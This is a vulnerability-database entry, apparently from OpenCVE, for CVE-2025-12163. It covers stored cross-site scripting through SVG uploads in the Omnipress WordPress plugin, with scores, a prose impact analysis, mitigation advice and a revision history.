Description
The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Published: 2025-12-05
Score: 6.4 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Stored Cross‑Site Scripting via SVG uploads
Action: Patch
AI Analysis

Impact

The Omnipress plugin for WordPress permits authenticated users with Author‑level access to upload SVG files. Because the plugin does not sanitize user‑supplied SVG content nor escape output, these files are stored and served unchanged. A malicious SVG containing injected JavaScript or other executable payload will run in the browser of any user who opens the file, satisfying CWE‑79 and enabling the attacker to execute arbitrary client‑side code, steal session cookies, or deface pages on the site.

Affected Systems

All released versions of Omnipress up to and including 1.6.5 are affected. The plugin, distributed under the omnipressteam:Omnipress vendor label, contains the flaw in its core REST API upload handling routines. Administrators or site editors with Author role should treat any current or past SVG uploads as potentially malicious and review or remove them.

Risk and Exploitability

The CVSS score of 6.4 classifies the vulnerability as medium severity. The EPSS score falls below 1%, indicating that the likelihood of exploitation observed in the wild is very low today, and it is not listed in the CISA KEV catalog. Nonetheless, because the attacker needs only Author‑level authentication, an attacker could easily exploit it. The attack vector involves an author logging in, uploading a crafted SVG via the plugin’s file‑upload endpoint, and then any site visitor who opens that file will suffer cross‑site scripting. The path is purely through the web interface, with no requirement for network‑level access.

Generated by OpenCVE AI on April 27, 2026 at 22:43 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Omnipress to the latest patched version, if an update exists.
  • Restrict the Author role’s ability to upload SVG files or disable SVG uploads entirely, limiting that permission to administrators only.
  • Remove or replace any SVG files that were uploaded before the patch, to eliminate existing malicious content.
  • As an additional measure, use a sanitization plugin or configure the server to strip disallowed SVG elements and attributes before serving them.

Generated by OpenCVE AI on April 27, 2026 at 22:43 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 08 Apr 2026 17:30:00 +0000

Type Values Removed Values Added
Weaknesses CWE-434

Wed, 08 Apr 2026 17:00:00 +0000

Type Values Removed Values Added
Description The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Title Omnipress <= 1.6.3 - Authenticated (Author+) Stored Cross-Site Scripting Omnipress <= 1.6.5 - Authenticated (Author+) Stored Cross-Site Scripting
Weaknesses CWE-79
References

Fri, 05 Dec 2025 16:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Fri, 05 Dec 2025 11:00:00 +0000

Type Values Removed Values Added
First Time appeared Omnipressteam
Omnipressteam omnipress
Wordpress
Wordpress wordpress
Vendors & Products Omnipressteam
Omnipressteam omnipress
Wordpress
Wordpress wordpress

Fri, 05 Dec 2025 05:45:00 +0000

Type Values Removed Values Added
Description The Omnipress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Title Omnipress <= 1.6.3 - Authenticated (Author+) Stored Cross-Site Scripting
Weaknesses CWE-434
References
Metrics cvssV3_1

{'score': 6.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N'}

Subscriptions

Omnipressteam Omnipress
Wordpress Wordpress
cve-icon MITRE

Status: PUBLISHED

Assigner: Wordfence

Published:

Updated: 2026-04-08T16:36:59.977Z

Reserved: 2025-10-24T14:04:10.223Z

Link: CVE-2025-12163

cve-icon Vulnrichment

Updated: 2025-12-05T15:21:44.517Z

cve-icon NVD

Status : Deferred

Published: 2025-12-05T06:16:06.053

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-12163

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-27T22:45:15Z

Weaknesses